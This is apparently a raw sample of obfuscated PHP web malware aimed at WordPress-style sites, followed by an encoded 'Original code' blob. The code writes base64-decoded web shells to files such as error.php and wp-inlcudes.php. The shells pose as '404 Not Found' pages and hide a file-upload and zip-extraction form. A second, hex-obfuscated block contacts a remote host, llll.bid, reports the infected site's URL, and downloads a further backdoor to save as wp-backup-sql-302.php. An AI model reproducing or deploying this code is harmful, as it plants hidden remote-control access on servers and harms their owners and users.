\"PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDQgTm90IEZvdW5kPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Tm90IEZvdW5kPC9oMT4KPHA+VGhlIHJlcXVlc3RlZCBVUkwgL2Vhc2Qgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+CjwvYm9keT48L2h0bWw+Cjw/cGhwCmlmKGlzc2V0KCRfR0VUWyJwaHBzaGVsbHMiXSkpewogIGVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CiAgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CiAgaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewogICRmaWxlID0gJF9GSUxFU1snZmlsZSddWyduYW1lJ107CiAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsKICAkemlwID0gbmV3IFppcEFyY2hpdmU7CiAgaWYgKCR6aXAtPm9wZW4oJGZpbGUpID09PSBUUlVFKSB7CiAgICAgJHppcC0+ZXh0cmFjdFRvKCcuLycpOwogICAgICR6aXAtPmNsb3NlKCk7CiAgZWNobyAnWcO8a2xlbWUgQmHFn2FyxLFsxLEnOwogIH0gZWxzZSB7CiAgZWNobyAnWcO8a2xlbm1lZGkuJzsKICB9CiAgfWVsc2V7CiAgZWNobyAnPGI+QmFzYXJpc2l6PC9iPjxicj48YnI+JzsKICB9CiAgfQp9Cj8+\"; \r\n\$file = fopen(\"error.php\", \"w+\"); \$write = fwrite(\$file, base64_decode(\$zip1)); fclose(\$file); } function zip3() \r\n{ \$zip1 = \"PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9JRVRGLy9EVEQgSFRNTCAyLjAvL0VOIj4KPGh0bWw+PGhlYWQ+Cjx0aXRsZT40MDQgTm90IEZvdW5kPC90aXRsZT4KPC9oZWFkPjxib2R5Pgo8aDE+Tm90IEZvdW5kPC9oMT4KPHA+VGhlIHJlcXVlc3RlZCBVUkwgL2Vhc2Qgd2FzIG5vdCBmb3VuZCBvbiB0aGlzIHNlcnZlci48L3A+CjwvYm9keT48L2h0bWw+Cjw/cGhwCmlmKGlzc2V0KCRfR0VUWyJwaHBzaGVsbHMiXSkpewogIGVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CiAgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7CiAgaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewogICRmaWxlID0gJF9GSUxFU1snZmlsZSddWyduYW1lJ107CiAgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsKICAkemlwID0gbmV3IFppcEFyY2hpdmU7CiAgaWYgKCR6aXAtPm9wZW4oJGZpbGUpID09PSBUUlVFKSB7CiAgICAgJHppcC0+ZXh0cmFjdFRvKCcuLycpOwogICAgICR6aXAtPmNsb3NlKCk7CiAgZWNobyAnWcO8a2xlbWUgQmHFn2FyxLFsxLEnOwogIH0gZWxzZSB7CiAgZWNobyAnWcO8a2xlbm1lZGkuJzsKICB9CiAgfWVsc2V7CiAgZWNobyAnPGI+QmFzYXJpc2l6PC9iPjxicj48YnI+JzsKICB9CiAgfQp9Cj8+\"; \r\n\$file = fopen(\"../error.php\", \"w+\"); \$write = fwrite(\$file, base64_decode(\$zip1)); fclose(\$file); } function zip4() \r\n{ \$zip1 = \"PD9waHAKaWYoaXNzZXQoJF9HRVRbImthdGliIl0pKXsKZWNobyAnPGI+U3cgQmlsZ2k8YnI+PGJyPicucGhwX3VuYW1lKCkuJzxicj4gWcO8a2xleWVjZcSfaW5peiBEb3N5YSAuemlwIE9sYW1sxLFkxLFyLjwvYj4nOwplY2hvICc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOwplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsKaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgewokZmlsZSA9ICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddOwppZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgewokemlwID0gbmV3IFppcEFyY2hpdmU7CmlmICgkemlwLT5vcGVuKCRmaWxlKSA9PT0gVFJVRSkgewogICAgJHppcC0+ZXh0cmFjdFRvKCcuLycpOwogICAgJHppcC0+Y2xvc2UoKTsKZWNobyAnWcO8a2xlbWUgQmHFn2FyxLFsxLEnOwp9IGVsc2UgewplY2hvICdZw7xrbGVuZGkgQW5jYWsgw4fEsWthcm1hIEJhxZ9hcsSxc8Sxei4nOwp9ICAgIAp9ZWxzZXsgCmVjaG8gJzxiPkJhc2FyaXNpejwvYj48YnI+PGJyPic7IAp9Cn0KfQo/Pg==\"; \$file = fopen(\"wp-inlcudes.php\", \"w+\"); \r\n\$write = fwrite(\$file, base64_decode(\$zip1)); fclose(\$file); } zip(); zip1(); zip2(); zip3(); zip4(); function actionNetwork() { printHeader(); \r\n}}\r\n\r\n\r\n?>\r\n<?php\r\n\$actual_link = (isset(\$_SERVER['HTTPS']) && \$_SERVER['HTTPS'] === 'on' ? \"https\" : \"http\") . \"://\$_SERVER[SERVER_NAME]\$_SERVER[SCRIPT_NAME]\";\r\n\$actual_link = urlencode(\$actual_link);\r\n\r\nini_set(\"allow_url_fopen\", 1); \r\n\r\n\$sdfsdhh1hh1bdsbdbvbsdbv = \"68747470733a2f2f6c6c6c6c2e6269642f696d672f6c6f676f2e7068703f69643d\";\r\n\$lsgjasnbcabscjabscascas = \"\";\r\nfor ( \$bshdbhcbsdcsdcsd = 0; \$bshdbhcbsdcsdcsd < strlen( trim(\$sdfsdhh1hh1bdsbdbvbsdbv) ); \$bshdbhcbsdcsdcsd += 2 ) {\r\n\t\$lsgjasnbcabscjabscascas .= pack( \"H*\", substr( trim(\$sdfsdhh1hh1bdsbdbvbsdbv), \$bshdbhcbsdcsdcsd, 2 ) );\r\n}\r\n\$lostjtururururuji = 20;\r\n\$ljhshshshshshssss = 3;\r\n\$bhvbsahbvhasdvhbsadhvbhsadvs = str_split(trim(\$lsgjasnbcabscjabscascas), \$ljhshshshshshssss);\r\n\$weh2h2h22g2g2g2g2g2gg2 = array();\r\nfor (\$s1xcascascaasascsa = 0; \$s1xcascascaasascsa <= count(\$bhvbsahbvhasdvhbsadhvbhsadvs)-1; \$s1xcascascaasascsa+=1) {\r\n\t\$vvdsavsdavsdavsxc221123 = uniqid().uniqid().uniqid().uniqid();\r\n    \$kjnab22h2h2hh22hh2 = \"\";\r\n    for (\$bbvbhsvsdvsdvsdvi = 0; \$bbvbhsvsdvsdvsdvi < 20; \$bbvbhsvsdvsdvsdvi++) {\r\n        \$kjnab22h2h2hh22hh2 .= \$vvdsavsdavsdavsxc221123[rand(0, strlen(\$vvdsavsdavsdavsxc221123) - 1)];\r\n    }\r\n  \$weh2h2h22g2g2g2g2g2gg2[\$kjnab22h2h2hh22hh2] = \$bhvbsahbvhasdvhbsadhvbhsadvs[\$s1xcascascaasascsa];  \r\n}\r\n\$knj23njn4j3n2j4n23j4n234 = \"\";\r\nforeach(\$weh2h2h22g2g2g2g2g2gg2 as \$jlkjalfdjsafjdasfjasjlfjasdljf => \$nbhsdbfhdbshfbsdhbfhsdbh22v23){\r\n\t\$knj23njn4j3n2j4n23j4n234 .=\$jlkjalfdjsafjdasfjasjlfjasdljf.\$nbhsdbfhdbshfbsdhbfhsdbh22v23;\r\n}\r\n\$h2j3h4j23h4j2h3b4fggjndfjn = \"\";\r\nfor(\$bvbdvhsvbhsdvf1r1r11gsg=\$lostjtururururuji;\$bvbdvhsvbhsdvf1r1r11gsg<=strlen(\$knj23njn4j3n2j4n23j4n234);\$bvbdvhsvbhsdvf1r1r11gsg+=\$lostjtururururuji+\$ljhshshshshshssss){\r\n\t\$h2j3h4j23h4j2h3b4fggjndfjn .= \$knj23njn4j3n2j4n23j4n234[\$bvbdvhsvbhsdvf1r1r11gsg].\$knj23njn4j3n2j4n23j4n234[\$bvbdvhsvbhsdvf1r1r11gsg+1].\$knj23njn4j3n2j4n23j4n234[\$bvbdvhsvbhsdvf1r1r11gsg+2];\r\n}\r\n\r\n\r\n\$uplink = \"https://llll.bid/gX3xrFUZhCr67Sv9yxTmUuPZUczED82xHdk6TGuZrjA5ZBKKpvx6JLdsm7zL6ctEkGWkYgrSmjjy9VeXw9JfBenCGcZDAQ.txt\";\r\n\$currentpath = \$_SERVER['SERVER_NAME'] . dirname(\$_SERVER['REQUEST_URI']);\r\n\$actual_link2 = (isset(\$_SERVER['HTTPS']) && \$_SERVER['HTTPS'] === 'on' ? \"https\" : \"http\") . \"://\";\r\n\$currentpath = \$actual_link2 . \$currentpath;\r\n\$file = 'wp-backup-sql-302.php';\r\n\$ourlasturl = \$currentpath . \"/\" . \$file;\r\n\$ourlasturl = \"&id2=\" . urlencode(\$ourlasturl);\r\n\r\nfunction flget(\$link = \"\") {\r\nglobal \$h2j3h4j23h4j2h3b4fggjndfjn;\r\nglobal \$ourlasturl;\r\nglobal \$uplink;\r\n\$deger = \"0\";\r\nif(\$link == \"\") {return \$deger; }\r\nif(function_exists('file_get_contents')) {\r\n\$url = \$h2j3h4j23h4j2h3b4fggjndfjn . \$link . \$ourlasturl ;\r\n\$referrer = 'tFk53ubwHFpwt9xmUdRHF7EgGEp7a9V2LFLvJ6uAtBbLwW8vXeLNedeaAQbA2P26UETXsGcKB2';\r\n\$options = array(\r\n  'http'=>array(\r\n    'method'=>\"GET\",\r\n    'header'=>\"Accept-language: en\\r\\n\" .\r\n              \"Cookie: foo=bar\\r\\n\" .\r\n              \"Referer: \$referrer\\r\\n\" .\r\n              \"User-Agent: tQ7nA0dW5jB6bC9aD2hH7eB0nJ4vB2qC\\r\\n\"\r\n  )\r\n);\r\n\r\n\$context = stream_context_create(\$options);\r\n\$file = file_get_contents(\$url, false, \$context);\r\necho \$file;\r\n\$deger = \"1\";\r\nwriteflget(\$uplink);\r\nreturn \$deger;\r\n}\r\nelse { \r\nreturn \"0\";\r\n}\r\n}\r\n\r\nfunction curlget(\$link = \"\") {\r\nglobal \$h2j3h4j23h4j2h3b4fggjndfjn;\r\nglobal \$ourlasturl;\r\nglobal \$uplink;\r\n\$deger = \"0\";\r\nif(\$link == \"\") {return \$deger; }\r\nif(function_exists('curl_exec')) {\r\n\$url = \$h2j3h4j23h4j2h3b4fggjndfjn . \$link . \$ourlasturl;\r\n\r\n\$curl = curl_init(\$url);\r\ncurl_setopt(\$curl, CURLOPT_FAILONERROR, true);\r\ncurl_setopt(\$curl, CURLOPT_FOLLOWLOCATION, true);\r\ncurl_setopt(\$curl, CURLOPT_RETURNTRANSFER, true);\r\ncurl_setopt(\$curl, CURLOPT_SSL_VERIFYHOST, false);\r\ncurl_setopt(\$curl, CURLOPT_SSL_VERIFYPEER, false);  \r\ncurl_setopt(\$curl, CURLOPT_USERAGENT, 'tQ7nA0dW5jB6bC9aD2hH7eB0nJ4vB2qC');  \r\ncurl_setopt(\$curl, CURLOPT_REFERER, 'tFk53ubwHFpwt9xmUdRHF7EgGEp7a9V2LFLvJ6uAtBbLwW8vXeLNedeaAQbA2P26UETXsGcKB2');\r\n\$result = curl_exec(\$curl);\r\necho \$result;\r\n\$deger = \"1\";\r\nwriteflget(\$uplink);\r\nreturn \$deger;\r\n}\r\nelse {\r\nreturn \$deger;\r\n}\r\n}\r\n\r\n\r\nfunction writeflget(\$link) {\r\n\$currentpath = \$_SERVER['SERVER_NAME'] . dirname(\$_SERVER['REQUEST_URI']);\r\n\$actual_link2 = (isset(\$_SERVER['HTTPS']) && \$_SERVER['HTTPS'] === 'on' ? \"https\" : \"http\") . \"://\";\r\n\$currentpath = \$actual_link2 . \$currentpath;\r\n\$arrContextOptions=array(\r\n    \"ssl\"=>array(\r\n        \"verify_peer\"=>false,\r\n        \"verify_peer_name\"=>false,\r\n    ),\r\n);  \r\n\$file = 'wp-backup-sql-302.php';\r\n\$ourlasturl = \$currentpath . \"/\" . \$file;\r\nif(!is_file(\$file)){\r\n    \$contents = file_get_contents(\$link, false, stream_context_create(\$arrContextOptions));\r\n    file_put_contents(\$file, \$contents);\r\n}\r\n}\r\n\r\nflget(\$actual_link);\r\ncurlget(\$actual_link);\r\n\r\n?>\r\n");
exit;


Original code

<?php
$UeXploiT = "Sy1LzNFQt1dLL7FW10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TUHHMM8iLN64IyMnPDEkN0gQ\x42\x61w\x41\x3d";
$An0n_3xPloiTeR = "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